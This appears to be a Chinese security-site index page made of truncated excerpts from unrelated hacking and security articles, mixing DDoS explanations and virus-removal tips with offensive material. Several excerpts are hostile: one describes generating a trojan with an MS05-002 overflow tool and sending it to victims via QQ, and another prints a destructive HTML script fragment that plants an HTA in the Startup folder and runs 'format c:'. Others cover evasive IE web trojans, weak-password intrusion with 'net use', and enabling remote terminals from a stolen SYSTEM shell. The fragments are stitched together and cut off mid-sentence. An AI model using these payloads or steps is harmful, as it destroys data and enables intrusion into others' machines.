内网安全管理

已经有很多介绍DOS（Denial of Service，即拒绝服务）攻击的文章，但是，多数人还是不知道DOS到底是什么，它到底是怎么实现的。本文主要介绍DOS的机理和常见的实施方法。因前段时间仔细了解了TCP/IP协议以及RFC文档，有点心得。同时，文中有部分内容参考了Shaft的文章翻译而得。要想了解DOS攻击得实现机理，必须对TCP有一定

溢出攻击永远是安全界中，不可忽视的角色。而如今也正是肉鸡短缺的年代，能掌握一门最新的Ms05002溢出，必定会让你有“惊人”的收获。至于熟练的溢出如何炼成?具体方法请见下文所示! 　　实施方法：通过Ms05002攻击工具，溢出反弹IP、反弹端口，会生成含有木马性质的文件。然后将这个产生的文件，以QQ传输的形式发给受害者

首先，如果系统为WinMe或WinXP，则请先关闭系统还原功能；　　 步骤一，删除病毒主程序　　 请使用干净的系统软盘引导系统到纯DOS模式，然后转到系统安装目录（默认的系统安装目录为c:\windows\system32），输入以下命令，以便删除病毒程序：　　 C:\windows\system32>del msnotepad.exe　　 完毕后，取出系统软盘，重新

发现漏洞是有价值的。至今，仍有许多人相信是没有漏洞存在的，直到它们被公之于众。我们知道，漏洞是需要暴露的，但是在软件开发商被迫把问题公开的时候，他们扮演了什么角色呢？对于信息安全，我能够真正着迷的原因之一就是这个领域涉及了数量众多的不同技术。就个人电脑来讲，就有各种各样的体系结构、操作系统、设备和协

这是利用微软( Microsoft )的IE浏览器( Internet Explorer )所衍生出来的攻击方法。 以下这段就是具有破坏性的HTMLHacking Your Computer .scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta";scr.Doc="wsh.Run("start.exe /m format c:/q /autotest /u");alert("IMPORTANT : Windows is removing

还记得以前我利用小榕哥的WED+WIS入侵本地信息港的那篇文章吗？自从上次入侵之后，网站的管理员想尽了办法堵住了所有SQL注入漏洞，想通过SQL注入后台管理页面已经没有可能了。真是郁闷，但是转念一想，这正是一个练习技术的好机会，难道除了简单的工具利用外，我就没有其它的办法了吗？一定要想法子再次拿下这个站点。 　　

(上次我教给大家如何编辑和破解COMS密码的方法:)今天告诉大家如何编辑和破解系统密码) 　　既然第一道BIOS密码已经告破，那么我们就得在Windows中想点办法了(本文所谈到的Windows系统，如无特殊说明，为Windows 98系统)。虽然微软的这些加密技术有点让人担忧，可用上总比不用好。　　首先，我们要设置的就是登录密码。这就

以前黑站黑了很多，但是就没有想过会不会被追踪到，都没有想过怎么去擦自己的屁股，万万没想到在自己不再黑站的时候，却发现了自己的BBS被黑了。根据当初的判断，BBS程序是我们BCT小组成员编写的Lvbbs不会存在着上传漏洞和SQL注入啊！就算能拿到权限都不可能可以弄出个webshell出来，不是程序的漏洞的话，就一定是服务器的

既然要打造完美的IE网页木马，首先就必须给我们的完美制定一个标准，我个人认为一个完美的ＩＥ网页木马至少应具备下列四项特征：　　一：可以躲过杀毒软件的追杀；　　二：可以避开网络防火墙的报警；　　三：能够适用于多数的Windows操作系统（主要包括Windows 98、Windows Me、Windows 2000、Windows XP、Windows 2003）

金山毒霸6除了具有超强性能的查杀和防御病毒外，还具有一些特殊的应用。如果用户能够很熟练地使用这些特殊而实用的功能，在一些特殊时候就可以大大方便我们的电脑操作。一、修复EXE的文件关联 　　 金山毒霸6每次启动时都会自动检查注册表中的EXE默认文件关联是否正确，如果EXE文件关联不是系统默认的设置，则金山毒霸6会自

用过windows server 2003做服务器的人都知道 windows2003的性能安全性比以前的windows版本高出很多，但是也带来很多麻烦。 　　其中服务器最重要的远程管理“终端服务”居然要求授权，要许可证，否则120天过期。其实这个问题很好解决按照一下方法就可以。 　　操作步骤： 　　1，如果你服务器上已经开着终端服务，控制面板

有人以为只要采用了免费邮箱中的杀毒服务，就不用再购置杀毒软件了，其实，这是非常危险的想法。我们可以从性能、查杀途径、查杀能力、病毒处理方式和价格等几个方面来比较。　　　　一、性能比较　　　　杀毒软件对系统性能的影响体现在两个方面：查杀速度和资源占用。邮箱防毒却没有这么简单，它是集成第三方杀毒厂商的邮

前几天，本私服也同样遭受过黑客的攻击！但是研究了几次发现了漏洞的所在！ 　　下面我先写如何入侵计算机的，我用的是WINDOWS 2000 SEVER 　　1 XSCAN扫描IP 看看谁是弱口令（IP也非常容易得到，私服都有，弱口令就是用户名和密码都是系统默认的，没有改。） 　　2 打开DOS系统 在DOS下进行*作！ 　　c:/>net use \\192

让我们研究一些方案，分析攻击者如何发起攻击以及如何停止或预防他们。我将首先描述两种涉及内部攻击的方案（即，在组织内部发起的攻击），然后研究涉及外部攻击的两种方案。 　　内部攻击　　内部攻击者是解密攻击最常见的来源，因为攻击者具有对组织系统的直接访问权。第一种方案研究的是攻击者是心怀不满的雇员的情况。

国际计算机安全权威机构发布最新病毒公告称, 发现了一种新型的名为“W97M/Melissa”的宏病毒（美丽杀手）, 该病毒能传染Word97 和Word2000。第一天便有 60000 台以上机器被感染，短短的一个星期，互联网便经历了一场罕见的“电子邮件病毒”的风暴！“电子邮件病毒”真这么厉害吗？有没有方法可以解毒呢？下面让我们来看看这

纵观网络安全攻击的各种方式方法，其中DDoS类的攻击会给你的网络系统造成更大的危害。因此，了解DDoS，了解它的工作原理及防范措施，是一个计算机网络安全技术人员应必修的内容之一。　　　　一、DDoS的概念　　　　　　要想理解DDoS的概念，我们就必须先介绍一下DoS（拒绝服务），DoS的英文全称是Denial of Service，也就

如今市面上有很多加密光盘，这些光盘是以特殊形式刻录的。将它放入光驱后，就会出现一个软件的安装画面要你输入序列号，如果序列号正确就会出现一个文件浏览窗口，错误则跳回桌面。如果你是从资源浏览器中观看光盘文件就是一些图片之类的文件，你想找的文件却怎么也看不到。这样的事情你碰到过吧?如果你的光盘序列号丢了或

作为开放源码促进会的领袖人物，埃里克·雷蒙德一直在商界努力为老一代的Unix的程序员和越来越多的Linux的拥护者之间搭建一座桥梁。而且他的这一思想与他写的“新黑客字典”一书的内容不谋而合，该书1991年出版，主要谈到了因特网和黑客文化，至今仍具有浓厚的传奇色彩。 　　最近埃里克·雷蒙德推出了他的一本新书癠nix编

DDoS攻击引起的网络拥塞，是由恶意主机控制大量傀儡机所造成的，并非传统意义上的端到端拥塞，所以只能在路由器上进行控制，即基于IP拥塞控制来实现的。而目前主流的七种IP拥塞控制算法都需要在改进后，才能有效地应用于防范DDoS攻击。 s=a14>分布式拒绝服务DDoS（Distributed Denial of Service）攻击被认为是目前Inter

今天介绍的这种开终端的方法，绿色，环保，无污染~~ 　　不须上传任何文件开启终端的方法适合win2k,xp,2003. 　　本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~ 　　在无须传任何文件的情况下开启终端服务。 　　一、win 2k下终端开启终端 　　首先用ECHO写一个3389.reg文件,然后导入到注册表，echo代